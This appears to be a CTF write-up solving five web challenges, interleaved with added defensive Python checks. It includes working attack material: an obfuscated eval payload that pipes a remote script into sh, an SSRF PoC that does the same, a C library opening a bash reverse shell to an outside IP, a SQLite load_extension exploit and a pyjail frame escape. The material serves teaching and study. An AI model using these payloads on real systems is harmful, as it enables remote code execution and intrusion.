simple_php
```php
<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);
if(isset($_POST['cmd'])){
    $cmd = escapeshellcmd($_POST['cmd']);
    if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
        system($cmd);
    }
}
show_source(__FILE__);
?>
```
The open_basedir setting is of no use here at all. The final payload goes through `eval`, with backslashes (`\`) inserted into the blacklisted words so the regex never sees them: ``cmd=eval `ec\ho Y3VybCBo\dHRwOi8vOC4xMzAuMjQuMTg4OjgwMDAvMS5zaHxzaA==|base\64 -d|s\h` ``
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112779484-f715a06a-b023-43c6-b3b7-5b5f37c9176a.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u29cde1b3&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=279670&status=done&style=none&taskId=u664783d0-4ffb-4c7a-9777-6e3c036392f&title=&width=1316)
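As an added illustration (not from the writeup), the same blacklist transcribed into Python and applied twice: to the raw string, as the challenge does, and to the token stream the shell ends up with after `eval` re-parses the backtick-quoted command. The payload is a constructed one in the same shape as above (`aGk=` is base64 for "hi"); `shlex.split` is used as an approximation of sh tokenization.

```python
import re
import shlex

# The challenge's preg_match blacklist, transcribed as a Python pattern.
BLACKLIST = re.compile(
    r"ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*"
    r"|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac"
    r"|less|head|\.|\{|\}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date"
    r"|bash|env|\?|wget|'|\"|id|whoami",
    re.I,
)


def blacklist_hits(cmd):
    """Keywords the filter finds in the string exactly as submitted."""
    return BLACKLIST.findall(cmd)


def shell_view(cmd):
    """Approximate the token stream the shell sees once backslash escapes
    are consumed (eval makes the shell re-parse the backtick string, so
    that second parse is the one that matters). shlex approximates sh
    tokenization; it is not a full shell parser."""
    return " ".join(shlex.split(cmd))


def hardened_blacklist_hits(cmd):
    """Same list, but matched against the shell's view of the input."""
    return blacklist_hits(shell_view(cmd))


def allowlist_ok(cmd, allowed=("uptime", "hostname")):
    """The actual fix: accept only whole commands from a fixed list and
    never hand user-controlled text to a shell at all."""
    return cmd.strip() in allowed


# Constructed payload in the shape of the writeup's (aGk= is base64 "hi").
PAYLOAD = r"eval `ec\ho aGk=|base\64 -d|s\h`"
```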
After getting the reverse shell there was no flag file, so I looked at ps -ef.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112803066-5cf59c4f-4d94-4526-b709-c6b1eeca2f53.png#averageHue=%232d2f3a&clientId=uc7aa35c2-bfa6-4&errorMessage=unknown%20error&from=paste&height=836&id=u7fb1cb3a&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=546852&status=error&style=none&taskId=u44425b1a-41aa-4f3f-83fe-7474a24b20b&title=&width=1316)
mysql was present; after bringing the host onto the CS platform, `mysql -uroot -proot` connected straight in and the flag was read from there.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/29650981/1716108068346-6ad5dcf2-28d6-4be5-8635-c30948655048.png#averageHue=%2330323a&clientId=u21684f9d-2324-4&from=paste&height=704&id=EiRhh&originHeight=1056&originWidth=1803&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=311401&status=done&style=none&taskId=u5c79f255-a26b-4400-8596-7618aa5424b&title=&width=1202)
easycms
dirsearch finds flag.php, whose contents give the hint for what follows:
```php
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just input 'cmd' From 127.0.0.1";
    return;
}else{
    system($_GET['cmd']);
}
```
In other words, all we need is an SSRF point.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111579072-04af536a-c64d-407b-a0af-624143ac59b8.png#averageHue=%2325262a&clientId=uc7aa35c2-bfa6-4&from=paste&height=965&id=u91365f33&originHeight=1930&originWidth=3218&originalType=binary&ratio=2&rotation=0&showTitle=false&size=743970&status=done&style=none&taskId=u9ee26ecb-4952-4e06-ac4b-5e33abc6d9f&title=&width=1609)
Source review shows the down_img route has an SSRF vulnerability,
but the input has to satisfy the regex `/(src)=([\"|']?)([^ \"'>]+)\\2/i`.
What this regex picks out is the src value of an img tag, for example: `<img src="http://xxx?cmd=whoami"/>`
The route was originally meant to locate the src inside img tags, but because the input is under our control it turns into SSRF. The final PoC:
```
value=<img src="http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh" alt="Example Image">
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112211908-61b8b1a7-da2c-4baa-a618-cb9b48ac064d.png#averageHue=%23b1b1b1&clientId=uc7aa35c2-bfa6-4&from=paste&height=1041&id=u67773f13&originHeight=2082&originWidth=3528&originalType=binary&ratio=2&rotation=0&showTitle=false&size=388306&status=done&style=none&taskId=u7d26b620-6c4d-4335-96ee-f70eca43c2d&title=&width=1764)
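Added example (not the CMS's code): the writeup's src-extracting regex in Python, followed by the check a server-side fetcher like down_img needs before following the URL, since flag.php's REMOTE_ADDR test treats anything originating on the box itself as trusted. Literal IP hosts are classified with `ipaddress`; for hostnames the resolved address (and every redirect target) still has to be checked before connecting, which this snippet leaves out. The sample input is constructed in the shape of the PoC above with the command replaced by a placeholder.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# The writeup's regex as a Python pattern. Note the "|" inside the character
# class is literal, so "|" is also accepted as a quote character.
SRC_RE = re.compile(r"""(src)=(["|']?)([^ "'>]+)\2""", re.I)

LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def extract_src(html):
    m = SRC_RE.search(html)
    return m.group(3) if m else None


def ssrf_verdict(url):
    """(allowed, reason) for a URL the server would fetch on the user's behalf."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    if host.lower() in LOCAL_NAMES:
        return False, "loopback name"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not a literal address: resolve it and re-run the classification
        # on the result (and on every redirect hop) before connecting.
        return True, "hostname; resolve and re-check before connecting"
    if (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
        return False, "%s is not a public address" % ip
    return True, "public address"


def check_down_img(value):
    """What the route should do with the user-supplied value."""
    url = extract_src(value)
    if url is None:
        return False, "no src attribute matched"
    return ssrf_verdict(url)


# Constructed input in the shape of the writeup's PoC (command replaced).
POC = '<img src="http://127.0.0.1/flag.php?cmd=PLACEHOLDER" alt="Example Image">'
```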
After sending the request, the VPS receives the callback.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112233991-2cb69a97-a839-4a9d-ad3d-1a1f7dc0ed3b.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u809d9ff4&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=287165&status=done&style=none&taskId=u03f4e00c-acc1-46fe-a660-db328589439&title=&width=1316)
Finally, the flag.
ezjava
The topic tested is the SQLite part of JDBC attacks in Java.
The challenge offers three JDBC services, but only sqlite is actually usable, and the goal is RCE. Note that the extension_enable option is turned on:
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108985265-0ff4a79e-364a-475c-939c-768d58cf28ba.png#averageHue=%23222326&clientId=uc7aa35c2-bfa6-4&from=paste&height=363&id=zRnHo&originHeight=726&originWidth=2140&originalType=binary&ratio=2&rotation=0&showTitle=false&size=186280&status=done&style=none&taskId=u2dc5f5f6-4e34-4e57-a41c-59101e73a2a&title=&width=1070)
Extension loading is enabled, and there is already an article on this attack surface:
https://conference.hitb.org/files/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&%20Chen%20Hongkun.pdf
The slides explain how to load a remote db file. First, attach a remote debugger and look at the logic.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110715893-885c0680-942d-4c2b-bc94-fc210a34fa74.png#averageHue=%23556e65&clientId=uc7aa35c2-bfa6-4&from=paste&height=826&id=z9RnT&originHeight=1652&originWidth=3444&originalType=binary&ratio=2&rotation=0&showTitle=false&size=674273&status=done&style=none&taskId=u64857429-ce82-44cd-86d5-50f6a074bd0&title=&width=1722)
The hashcode of resourceAddr, prefixed with a fixed string, is used as the final cache file name. So the idea is to use this behavior to get a malicious .so file cached; that is the first request.
The malicious .so is built as follows:
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* Entry point named in load_extension('<cached file>', 'flag'). */
void flag() {
    system("bash -c 'bash -i >& /dev/tcp/8.130.24.188/7778 <&1'");
}

/* Padding: a 500 KiB initialised array so the .so file is large. */
void space() {
    static char waste[500 * 1024] = {2};
}
```
```sh
gcc -shared -fPIC exp.c -o exp.so
```
Finally, load_extension('xxx','flag') loads the flag function and triggers the reverse shell.
The second request then loads this malicious .so file.
```java
package com.javasec.pocs.solutions.ciscn;

import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.Statement;

public class Gen {
    public static void main(String[] args) {
        try {
            String dbFile = "poc.db";
            File file = new File(dbFile);
            Class.forName("org.sqlite.JDBC");
            Connection conn = DriverManager.getConnection("jdbc:sqlite:" + dbFile);
            System.out.println("Opened database successfully");
            // The view body runs when the view is queried; the path is the target's cached .so.
            String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp-1914716480.db','flag'));";
            PreparedStatement preStmt = conn.prepareStatement(sql);
            preStmt.executeUpdate();
            preStmt.close();
            conn.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
The script above generates the malicious db file: it creates a view named security with an AS SELECT body. (The name security is taken from the slides; I copied it as is.)
When we then send the request, the SELECT is triggered:
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110930844-2d9caf1d-fab5-44f2-96a6-5738c5b77383.png#averageHue=%23232427&clientId=uc7aa35c2-bfa6-4&from=paste&height=256&id=UcmA2&originHeight=512&originWidth=1948&originalType=binary&ratio=2&rotation=0&showTitle=false&size=118260&status=done&style=none&taskId=ue8bddff1-053c-4dc8-a241-6a3e064477d&title=&width=974)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110926524-d7586cb7-47c4-4a60-9ff5-9fd7e301dc4a.png#averageHue=%23212226&clientId=uc7aa35c2-bfa6-4&from=paste&height=558&id=kkYrM&originHeight=1116&originWidth=1848&originalType=binary&ratio=2&rotation=0&showTitle=false&size=177962&status=done&style=none&taskId=ua22bb6c4-5230-4f54-917d-fff4015ecc0&title=&width=924)
Now the actual run. First, get the target to cache our .so file:
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111203456-52626a01-d2d7-4a32-9323-7db9f81f58c1.png#averageHue=%23282b3a&clientId=uc7aa35c2-bfa6-4&from=paste&height=823&id=Ebp6p&originHeight=1646&originWidth=2574&originalType=binary&ratio=2&rotation=0&showTitle=false&size=680340&status=done&style=none&taskId=u2eb403f0-a5d0-47a5-83a9-da902048e45&title=&width=1287)
Then load the malicious db, which triggers the specified SQL statement.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111242096-11de341f-e12e-44a0-91a0-488dfe842a88.png#averageHue=%232a2c3b&clientId=uc7aa35c2-bfa6-4&from=paste&height=800&id=aPkOQ&originHeight=1600&originWidth=2628&originalType=binary&ratio=2&rotation=0&showTitle=false&size=773480&status=done&style=none&taskId=u070fab08-d874-4f9b-a61a-74d49bef7bc&title=&width=1314)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111250480-2d1ed89b-ca2d-4d6b-a21c-c3831c26dc0a.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=sLFEn&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=286037&status=done&style=none&taskId=u6d4908b0-ab05-43e8-8330-08a5b1548ab&title=&width=1316)
Finally, the flag.
mossfern
pyjail frame escape
https://xz.aliyun.com/t/13635?time__1311=mqmxnQ0QiQi%3DDteDsD7md0%3DdG%3Dd8bgh8wiD#toc-5
Following the article above:
```http
POST /api/run HTTP/1.1
Host: eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Origin: http://eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com
Referer: http://eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com/
Accept: application/json, text/plain, */*
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1713496688,1713681080,1715993802
Content-Length: 199

{"code":"def boogipop():\n def exp():\n yield pop.gi_frame.f_back.f_back.f_back\n pop = exp()\n for exp in pop:\n boo=exp\n return boo\nkino=boogipop()\nprint(kino)"}
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108779323-eb6efc91-f311-41a3-8b2c-e9012a933c19.png#averageHue=%23d9dfca&clientId=uc7aa35c2-bfa6-4&from=paste&height=909&id=urVbQ&originHeight=1818&originWidth=2972&originalType=binary&ratio=2&rotation=0&showTitle=false&size=743547&status=done&style=none&taskId=u6ba949b6-c518-4ee3-b79e-2cb601ca678&title=&width=1486)
As we can see, the f_code object has been obtained, and as the article explains, f_code carries a co_consts attribute.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108831657-295aa243-c34e-4693-aa70-16956fb12cca.png#averageHue=%23242528&clientId=uc7aa35c2-bfa6-4&from=paste&height=880&id=F6qjn&originHeight=1760&originWidth=3318&originalType=binary&ratio=2&rotation=0&showTitle=false&size=295830&status=done&style=none&taskId=u127d5339-c078-4418-8d19-b1cdd38d63f&title=&width=1659)
When testing locally, I found that a result containing the word flag gets blocked; this is easy to get around.
Because the check is on the whole output string, slicing the string returns the flag:
```python
def boogipop():
    def exp():
        yield pop.gi_frame.f_back.f_back.f_back
    pop = exp()
    for exp in pop:
        boo = exp
    return boo

kino = boogipop()
print(kino.f_code.co_consts[19][1:])
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108877232-9f24eebd-c30f-4397-bb12-c40d1d6de201.png#averageHue=%23dfdfdf&clientId=uc7aa35c2-bfa6-4&from=paste&height=840&id=vvoFG&originHeight=1680&originWidth=2728&originalType=binary&ratio=2&rotation=0&showTitle=false&size=433681&status=done&style=none&taskId=u2f8b3324-a2e3-41eb-8bbe-984615839cf&title=&width=1364)
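Added defensive example (not part of the writeup or the challenge): an AST pre-check a jail could run before executing submitted code, flagging the frame-walking attributes the payload above depends on, next to the naive whole-output substring check the writeup bypasses with slicing. The flagged name set is an assumption of this example.

```python
import ast

# Attribute names that walk out of a frame or read compiled constants;
# the writeup's payload uses gi_frame, f_back, f_code and co_consts.
FRAME_ATTRS = {
    "gi_frame", "cr_frame", "ag_frame", "f_back", "f_code", "f_globals",
    "f_locals", "f_builtins", "co_consts", "co_names", "tb_frame", "tb_next",
}
# Names that reach the same objects dynamically, so a static attribute
# check alone would be sidestepped through them.
RISKY_NAMES = {"getattr", "eval", "exec", "vars", "globals", "compile"}


def audit(source):
    """Return (lineno, reason) findings; empty means nothing was flagged.
    This is one layer of a jail, not a sandbox: it only sees attribute
    names written literally in the submitted source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute):
            if node.attr in FRAME_ATTRS or node.attr.startswith("__"):
                findings.append((node.lineno, "attribute " + node.attr))
        elif isinstance(node, ast.Name) and node.id in RISKY_NAMES:
            findings.append((node.lineno, "name " + node.id))
    return findings


def output_leaks(text, marker="flag"):
    """The challenge's output check: a substring test on the whole result,
    which a sliced value such as co_consts[19][1:] passes untouched."""
    return marker in text.lower()


# The writeup's payload, re-indented, used here as the sample input.
PAYLOAD = (
    "def boogipop():\n"
    "    def exp():\n"
    "        yield pop.gi_frame.f_back.f_back.f_back\n"
    "    pop = exp()\n"
    "    for exp in pop:\n"
    "        boo = exp\n"
    "    return boo\n"
    "kino = boogipop()\n"
    "print(kino.f_code.co_consts[19][1:])\n"
)
```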
easycms_revenge
Same as the day-one challenge.
```
value=<img src="http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh" alt="Example Image">
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112400543-d1f95c44-8c15-4c8c-b7d9-9d5eceef24b6.png#averageHue=%23d9cf95&clientId=uc7aa35c2-bfa6-4&from=paste&height=1041&id=ua30702d1&originHeight=2082&originWidth=3528&originalType=binary&ratio=2&rotation=0&showTitle=false&size=761634&status=done&style=none&taskId=uff0a57b7-1e65-471d-8976-b7474d992a2&title=&width=1764)
After sending the request, the VPS receives the callback.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112403326-09db90f9-0e7c-4391-91c4-81d1178df519.png#averageHue=%232c2e3a&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u2ce8c8c1&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=392413&status=done&style=none&taskId=u79378ee2-15bd-4634-a506-8fc32810fb5&title=&width=1316)
Finally, the flag.